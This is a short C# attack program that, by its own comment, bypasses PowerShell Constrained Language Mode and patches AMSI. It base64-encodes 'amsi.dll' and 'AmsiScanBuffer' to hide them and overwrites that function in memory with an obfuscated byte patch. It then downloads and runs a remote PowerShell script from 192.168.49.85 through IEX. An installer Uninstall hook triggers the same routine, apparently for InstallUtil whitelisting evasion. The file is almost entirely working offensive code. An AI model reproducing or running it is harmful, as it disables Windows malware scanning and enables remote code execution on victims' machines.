// Undetected CLM Bypass with obfuscated AMSI patch
using System;
using System.Management.Automation;
using System.Text;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass {
	class Program {
		 [DllImport("kernel32")]
		static extern IntPtr GetProcAddress(
			IntPtr hModule,
			string procName);

		[DllImport("kernel32")]
		static extern IntPtr LoadLibrary(
			string name);

		[DllImport("kernel32")]
		static extern bool VirtualProtect(
			IntPtr lpAddress,
			UIntPtr dwSize,
			uint flNewProtect,
			out uint lpflOldProtect);
		static void Main(string[] args) {
			foo();
		}
		public static void foo() {
			byte[] data = Convert.FromBase64String("YW1zaS5kbGw=");
			string am = Encoding.UTF8.GetString(data);
			var lib = LoadLibrary(am);
			data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=");
			am = Encoding.UTF8.GetString(data);
			var asb = GetProcAddress(lib, am);
			var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 };
			for(int i = 0; i < patch.Length; i++) {
				patch[i] = (byte)(((uint)patch[i] - 1));
			}
			_ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
			Marshal.Copy(patch, 0, asb, patch.Length);
			_ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
			String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')";
			Runspace rs = RunspaceFactory.CreateRunspace();
			rs.Open();
			PowerShell ps = PowerShell.Create();
			ps.Runspace = rs;
			ps.AddScript(cmd);
			ps.Invoke();
			rs.Close();
		}
	}
	[System.ComponentModel.RunInstaller(true)]
	public class Sample : System.Configuration.Install.Installer {
		public override void Uninstall(System.Collections.IDictionary savedState) {
			base.Uninstall(savedState);
			Program.foo();
		}
	}
}